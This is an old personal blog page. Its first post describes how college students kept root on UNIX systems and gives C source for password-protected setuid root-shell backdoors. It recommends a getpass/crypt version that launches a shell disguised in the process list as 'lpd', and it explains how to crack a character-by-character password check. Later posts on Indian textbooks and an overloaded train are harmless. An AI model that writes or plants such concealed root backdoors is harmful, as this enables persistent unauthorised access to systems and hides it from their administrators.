Sunday, May 18, 2008

Hacking Passwords

There was a time (well, 8-10 years ago when I was in college) when there were many vulnerabilities in common UNIX systems (Sun Solaris/HP-UX/Linux/Digital Unix and what not!) which allowed someone to get superuser (root) privileges.

Normally the college geeks would download some shell script or a C program which would exploit some vulnerability and land you in a shell with a '#' prompt, and it was great. The geeks stopped here, but the ultra-geeks went further! Using the '#' prompt they created another C program which would just launch a shell, and set the "SetUserId" bit on that program.

When such a program is launched by any user, it runs with root privileges, and since it launches a shell you eventually end up with a '#' prompt. To prevent misuse of such a program by non-geeks they added a password feature: the program would first ask for a password and, if it matched the secret password (encoded in the program itself), launch the shell.

It worked fine mostly but had a few problems. First, these ultra-geeks didn't know how to hide characters when taking the password as input, which meant somebody could look over their shoulder when they were themselves using this program to get root privileges.

Another problem (which was not well known to some geeks) was that the secret password was itself stored as a string in the program, and somebody could see it by opening the program in a binary editor. Thanks to the "strings" command we got to hack many such programs.

We found a really smart-ultra-geek who had solved both problems and whose root-shell launcher looked like this:-

#include <stdio.h>
#include <stdlib.h>   /* system() */

int main()
{
    // use termios.h functions to set the terminal in a raw mode
    // and disable the character echo - password not visible now
    if (getchar() == 'u')
     if (getchar() == 'n')
      if (getchar() == '1')
       if (getchar() == 'c')
        if (getchar() == '0')
         if (getchar() == 'r')
          if (getchar() == 'n')
          {
              system("/bin/sh"); // launch root shell
              return 0;
          }
    // any wrong character falls through to here and the program exits at once
    return 1;
}

Checking the password character by character ensures that no password string like "un1c0rn" is hidden in the binary for anyone to find. Seems pretty smart!

What this guy did not recognize was that it was ultra-easy to crack the password. If at any point while typing the password you enter a wrong character, the program exits immediately, whereas a correct character makes it wait for the next one. This way one can try 36 characters (digits + lower case letters), or more if one wishes to use the entire keyboard, to get the first letter of the secret password, and continue in the same way to get each subsequent letter.

Thus if the size of the input alphabet is 'm' and the length of the password is 'n', the password can be cracked in at most 'm * n' attempts, whereas the theoretical maximum for an all-or-nothing check is 'm^n' attempts. So much for the ingenuity of the smart-ultra-geek (with all that termios.h stuff for turning off echo).
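To make the two points above concrete, here is an added example (mine, not code from the original post): a model of the nested-if checker that reports how many characters it consumed before exiting, next to a checker that reads the whole guess before answering, plus the m * n versus m^n counts. The secret "un1c0rn" is reused from the post purely as a constructed test value.

```c
#include <stdio.h>
#include <string.h>

/* Constructed secret for this demonstration only. */
static const char SECRET[] = "un1c0rn";

/* Model of the nested-if checker: one getchar() per position, exit at the first
 * mismatch. Returns how many characters were read before the program gave up
 * (strlen(SECRET) on success). That count is what someone at the terminal sees:
 * the program either exits right away or keeps waiting for the next key. */
size_t leaky_check(const char *guess)
{
    for (size_t i = 0; SECRET[i] != '\0'; i++)
        if (guess[i] != SECRET[i])
            return i + 1;           /* wrong key at position i: exit now */
    return sizeof(SECRET) - 1;      /* every character matched */
}

/* Hardened model: read the whole guess, compare every position without
 * short-circuiting, report only accept/reject. A guess wrong in the first
 * position and one wrong in the last position are indistinguishable. */
int whole_check(const char *guess)
{
    size_t n = strlen(SECRET), g = strlen(guess);
    unsigned char diff = (unsigned char)(g != n);
    for (size_t i = 0; i < n; i++)
        diff |= (unsigned char)((i < g ? guess[i] : 0) ^ SECRET[i]);
    return diff == 0;
}

/* Worst-case attempts for alphabet size m and length n: m*n when each position
 * can be confirmed on its own, m^n when the check is all-or-nothing. */
unsigned long long attempts_prefix_oracle(unsigned m, unsigned n)
{
    return (unsigned long long)m * n;
}
unsigned long long attempts_whole(unsigned m, unsigned n)
{
    unsigned long long total = 1;
    while (n-- > 0)
        total *= m;
    return total;
}

int main(void)
{
    printf("leaky: %zu %zu %zu  whole: %d %d %d\n",
           leaky_check("xn1c0rn"), leaky_check("unxc0rn"), leaky_check("un1c0rn"),
           whole_check("xn1c0rn"), whole_check("unxc0rn"), whole_check("un1c0rn"));
    printf("36 symbols, 7 chars: %llu vs %llu attempts\n",
           attempts_prefix_oracle(36, 7), attempts_whole(36, 7));
    return 0;
}
```

The leaky checker's return value climbs by one for each correctly guessed prefix character, which is the position-by-position signal described above; the whole-string checker returns the same 0 for every wrong guess.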

A simple solution which we used frequently was this:-

#include <stdio.h>
#include <string.h>
#include <unistd.h>   /* getpass(), execl() */
#include <crypt.h>    /* crypt(); link with -lcrypt */

int main()
{
    /* DES crypt() output is 13 characters, the first two being the salt */
    char *pEncPwd = "qwhDSFer437Tv";
    char *salt = "qw";
    char input[50], encPwd[14];
    char *typed, *enc;

    typed = getpass("");                /* reads the password with echo off */
    if (typed == NULL)
        return 1;
    strncpy(input, typed, sizeof(input) - 1);
    input[sizeof(input) - 1] = '\0';    /* getpass() may hand back more than 49 chars */
    enc = crypt(input, salt);
    if (enc == NULL)
        return 1;
    strncpy(encPwd, enc, 13);
    encPwd[13] = '\0';
    if (strncmp(encPwd, pEncPwd, 13))
    {
        return 1;
    }
    else
    {
        // launch shell, shown in the process list as "lpd"
        execl("/bin/sh", "lpd", (char *) NULL);
    }
    return 1;                           /* only reached if execl() fails */
}

Ignore any compilation errors in this program (because I don't have a UNIX box with me now), but it works great and solves both problems mentioned earlier using standard library functions. getpass() retrieves the text input with echo off, and crypt() encrypts it using the DES algorithm, resulting in a 13-byte encoded password. The program contains only the encrypted password in its binary. By the way, that "lpd" in execl() hides the shell process under the name "lpd".

Programming: Pearls of Wisdom

Recently I happened to visit this great site which contains excellent advice on programming techniques and common pitfalls. Plus it's an enjoyable ride. I won't give further details and would let you explore the website yourself.

Thanks to Alex Papadimoulis for "The Daily WTF"!!

Thursday, May 15, 2008

Kudos to NCERT

For those not of Indian origin, NCERT (National Council of Educational Research and Training) is a government body which publishes textbooks for students up to 12th grade, apart from doing 'educational research and training'.

When I was in my high school years (9th-12th grade) I enjoyed reading NCERT books. Being quite concise they took less time to study, and most of all they were not at all boring like other textbooks (from non-government publishers) which just included solved examples and drill problems.

Well, to my utter excitement these NCERT books have improved their standard much beyond what I had seen in my time (1995-1998). First let me remark on the physical design (well, because it is remarkable enough!). These books use color for diagrams to make them more attractive, contain very few misprints, use a wide variety of fonts to draw attention, and the paper is watermarked with the NCERT logo (check their site for the logo) to prevent counterfeit copies. And they happen to be quite cheap compared to other textbooks (probably because of government subsidy).

The things which I mention might not seem remarkable to foreigners, but if you actually go to a bookshop and get a textbook (other than NCERT ones) you will find that NCERT books are remarkable for their physical design alone, leave aside their content.

But the reason they have won my heart is primarily the content. This summer I had a chance to glance at the NCERT Mathematics textbook for 9th grade (I pick maths because it's my favorite subject, so readers beware! the opinions expressed in this post are primarily based on math texts). The book is really fantastic. These books focus on concept building and not problem solving. You have to read them and not start by working out problems.

The concepts are explained by simple examples, experiments and proofs (where possible), and many explanations contain historical notes or references to related interesting topics. For example, while introducing Euclidean geometry they specifically mention the history of the 5th postulate (which was the basis of the non-Euclidean geometries discovered later). And this is exciting enough for a 9th grader.

Now to the real test of a 9th grade book: the introduction to irrationals. Here NCERT goes beyond words and explanations and brings out diagrams in color. The real line is depicted by zooming in on various sections to illustrate the concept of denseness. This zooming is, by the way, performed using the image of a convex lens (commonly called a magnifying glass). What a nice way to express the fact that a small section of the number line is big enough to contain an infinite number of points (which represent numbers).

A point 'A' corresponding to an irrational number will seem to coincide with a rational point 'B' if you actually do the geometrical constructions. But when you zoom in, you will see that points 'A' and 'B' are different. No matter what rational point 'B' you choose, you will be able to zoom in on the line sufficiently so that point 'A' is different from point 'B'. This zooming in is the essence of 'Mathematical Analysis' and the informal equivalent of epsilon-delta.

Unfortunately and shamelessly, R. D. Sharma (famous nowadays for IIT-JEE books, although I am not sure he is the same guy) copies these diagrams (it's a xerox copy: the same line, the same magnifying glass), and that too in black & white. And it contains a lot of examples and problems. Sadly most of the answers to the problems are wrong (printing errors probably), so the student has no way of knowing (apart from his confidence, in case he has it) whether his answers are correct.

Finally the NCERT book had some appendices discussing the importance of proofs in mathematics. This part is quite well written and is expected to motivate readers to appreciate proofs and develop skills to provide proofs.

Let's congratulate NCERT for bringing out such nice textbooks and hope that they do an even better job in future.

Being Smart - II

Last time I had shown you the brighter side of 'being smart', but I guess it's fair only to balance it with the darker side too. The following is an account of what happened to me recently in the presence of smart people.

This time I was traveling from Bokaro to New Delhi by Ranchi Rajdhani Express. I was accompanied by my sister who is currently studying in Delhi. And this was her first visit to Delhi, so I wished that the journey would be enjoyable for her. Alas! This was not going to be the case as I would come to know later.

Anyway I was in a good mood and expected that the journey would meet her expectations (and mine too). Upon boarding the train, the attendant served us with packaged drinking water (this is the first thing these people have for you in Rajdhani express). And it began from here itself. The water was not chilled (well it was at normal temperature for a summer day). And more importantly it was some local grade bottle, not the usual "Rail Neer" made especially for Indian Railways.

My sister promptly objected to this (because other passengers did have 'Rail Neer' which was probably chilled) to which the attendant mentioned that the freezer was not working and the train was overloaded so there were not enough bottles of Rail Neer variety.

The term 'overloaded' gave quite a shock to me because, well, the book says that a Rajdhani Express cannot be overloaded (only confirmed passengers are allowed here), but I did not want to create a scene over such a thing as packaged water, so I ignored the attendant's reply completely and asked my sister to bear with it. After all, it's India! She was not very comfortable with this treatment, but I ignored that too.

Half an hour later it was time to serve the soup in order to prepare for the dinner. The soup along with soup-sticks is served in a small tray. And in this case I was in real awe! The attendant asked us to share the soup in a single tray because he had probably guessed that we were from the same family. The train is really overloaded man! They don't have packaged water, no trays and what not.

I got damn frustrated and exploded, "What do you want? That we share the soup in same tray, the dinner in same dish, sit on the same seat and sleep on the same berth! What the hell is going on here?" He was taken aback by my rush of adrenaline and gave us separate trays for the soup.

Passengers next to us were trying to calm me down and explained that there is no need to create a fuss over petty things. I was enraged even more. I pointed out that if I am paying Indian Railways every last paise of the fare then I should get every last bit of their service if I want to. And I told them that this time it was me, next time it could be you. Well, this prediction came true during dinner time!

The attendant was by now thoroughly scared of us, so he did not create any issues for us while serving dinner, but two passengers next to us did not get their usual 'curd' even when they demanded it twice. The attendant just ignored their request as if he hadn't heard it.

It was really awful. In fact I would say it was my worst journey in Rajdhani for the last three years. I got curious to find out about this strange 'overloading' thing. Before taking a nap on my berth I decided to survey my coach. The AC - 3 Tier coach has space for 64 confirmed passengers and 4-6 RAC passengers. But the survey revealed something really shocking. There were more than 90 passengers in total. On one berth I saw a man, his wife and his son, all sleeping together. There were many such berths. Hey man, the train was really overloaded.

What really happened is that many 'smart' waitlisted passengers bribed their way into the train (through the TTE) and gave the attendant good tip to get the food. The amount of food in the pantry car is such that it can handle 5-10 extra passengers per coach, but handling 20-25 extra people is really out of question. However, because of the heavy tip the attendants had to do something about it. Guess what, they made the confirmed passengers pay for all this nasty stuff.

The whole episode shows the attitude of passengers who are out to do anything to get a seat in Rajdhani. The government is definitely at fault (the TTE could have refused entry to the waitlisted passengers), but the primary fault lies with the people who try to break the rules at any opportunity thinking that they are too clever.

The moral of the story is: Don't try to get more than what you deserve. Sometimes you will be on the winning side by being smart, but at other times you could lose because someone turned out to be way smarter or just because of plain bad luck. If people choose to play by the rules then it will automatically discourage miscreants who try to take advantage by trying to get more than what they deserve.

For people who are yelling, "Why do people keep telling us about problems but not solutions?" I only need to repeat what I said earlier:

"Being smart is not about fooling people, but about doing things a better way (efficient, economical etc.) compared to others. When you bribe someone you are not actually being smart, but you are committing a legal crime."